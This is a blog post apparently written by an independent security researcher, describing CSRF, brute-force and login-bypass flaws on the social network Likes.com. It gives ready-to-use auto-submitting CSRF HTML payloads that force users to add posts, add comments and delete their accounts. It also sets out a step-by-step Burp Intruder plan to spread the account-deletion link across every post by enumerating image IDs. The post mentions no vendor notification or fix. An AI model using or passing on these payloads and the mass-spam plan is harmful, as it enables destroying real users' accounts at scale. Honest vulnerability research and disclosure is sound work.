Hello i'm Mohamed M.Fouad an Independent Security Researcher from Egypt. I have been got acknowledgement from many of the Firms like as Microsoft,Oracle,Yahoo,eBay,Sony,AT&T,Huawui,DropCam, Bitcasa, Get Pocket, Splitwise and so many...
================================================
CAUTION
THIS IS FOR LEARNING PURPOSE AND FOR ETHICAL USE ONLY...
Likes.com is social network application to Connect with people you like and make new friends for FREE.
Critical Vulnerability : LIKES Account Deletion CSRF
Hello Guys!
Today i will show you how I discovered a lot of critical security vulnerabilities at (Likes.com) it can lead to very harmful impact on all users by force users to add any post,add any comment and delete their accounts but these vulnerabilities can be escalated to deface all the site by posting malicious urls and all users delete their accounts.
Story:
While browsing Facebook one week ago i found some friends sharing photos i found that the source of these photo is LIKES.com first i wasn't know about it but when i google it i found it's a famous social network website used by all people like Facebook , twitter, Google+ etc... So i started to looking for security vulnerabilities so i found that all site vulnerable to CSRF attack and there was another vulnerabilities like login-brute force and login bypass but the most critical one for me was CSRF because it can force users to add any post,add any comment and delete their accounts and can be escalated to deface all the site by generating random POSTs(image_ids) and post malicious url to (DELETE USER ACCOUNTS) so you can call it SPAM to delete users accounts .
Vulnerabilities:
1 - Login Page brute-force attack :
attempt to discover a password by systematically trying every possible combination of letters, numbers,and symbols until you discover the one correct combination that works.
This login page doesn't have any protection against password-guessing attacks (brute force attacks).It's recommended to implement some type of account lockout after a defined number of incorrect password attempts.
2 - Add Post CSRF :
Here you can force any user to add post using CSRF
Payload :
<html>
<body onload="document.csrf.submit()">
<form action="http://likes.com/api/add_post" method="post" name="csrf">
<input type="hidden" name="caption" value="CSRF"><br>
<input type="hidden" name="post_type" value="text"><br>
<input type="hidden" name="description" value=""><br>
<input type="hidden" name="short_description" value=""><br>
<input type="hidden" name="add_source" value="desktop_compose"><br>
<input type="hidden" name="tag_length" value="0"><br>
</form>
</body>
</html>
3 - Add Comment CSRF :
here you can force users to add any comment to any post you need.
Payload :
<html>
<body onload="document.csrf.submit()">
<form action="http://likes.com/api/add_comment" method="post" name="csrf">
<input type="hidden" name="image_id" value="33901352"><br>
<input type="hidden" name="gallery_id" value="false"><br>
<input type="hidden" name="comment_text" value="<any malicious link or text>"><br>
</form>
</body>
</html>
Below is the Critical one !!!!
3 - DELETE USER ACCOUNTS :
Here you can use deactivate account (delete account) LIKES not deactivated account it delete it you can force users to delete their accounts by JUST ONE CLICK!!!! by uploading this payload to any domains owns by attacker and submit this malicoius URL to alot of POST in LIKES.COM JUST ONE CLICK will DELETE USER ACCOUNT.
Payload :
<html>
<body onload="document.csrf.submit()">
<form action="http://likes.com/api/delete_user" method="post" name="csrf">
<input type="hidden" name="break_cache" value="14094286391700.11307647102512419">
</form>
</body>
</html>
4 - Login Bypass :
i found a security problem bypass login when you click on "unsubscribe" link in your email notifications you be redirected to account settings try to open this url in any browser or different machine your account will be opened normal !!!!! so what about login ???? it bypassed your login .
HOW TO DEFACE ALL THE SITE :
First you have to register a new user on any domain and host delete user account payload as html file then you will shorten this published url now you're ready for full defacement so finally you need to share or publish this malicious url in all LIKES Post's Comments so how to do that you will open burp suites and intercept any comment request then you will take (image_id) parameter from the request this is the POST ID in LIKES.COM now it's time to create your dictionary of (image_ids) you can generate online a lot of ids and it's so easy because (image_id) parameter is 8-digits only so after generation you have your own dictionary IT'S TIME TO DEFACEMENT you will add this dictionary using intruder and enumerate all the image ids in the add_comment request with your MALICIOUS URL value as a comment and you can mark which request succeeded by Grep Value(Error) it's "Post Not Provided" in the response so all unchecked items will be the succeeded one now your malicious URL published in alot of Online POSTS and if any user CLICKED it his/her account will be deleted immediately without any confirmation.
 |
| Add Comment Request |
 |
| Intruder image id Enumeration Value |
Video demonstration URL :
Hope you find it interesting and HAVE FUN with POC Video :)
Regards,
CAUTION
THIS IS FOR LEARNING PURPOSE AND FOR ETHICAL USE ONLY...
No comments:
Post a Comment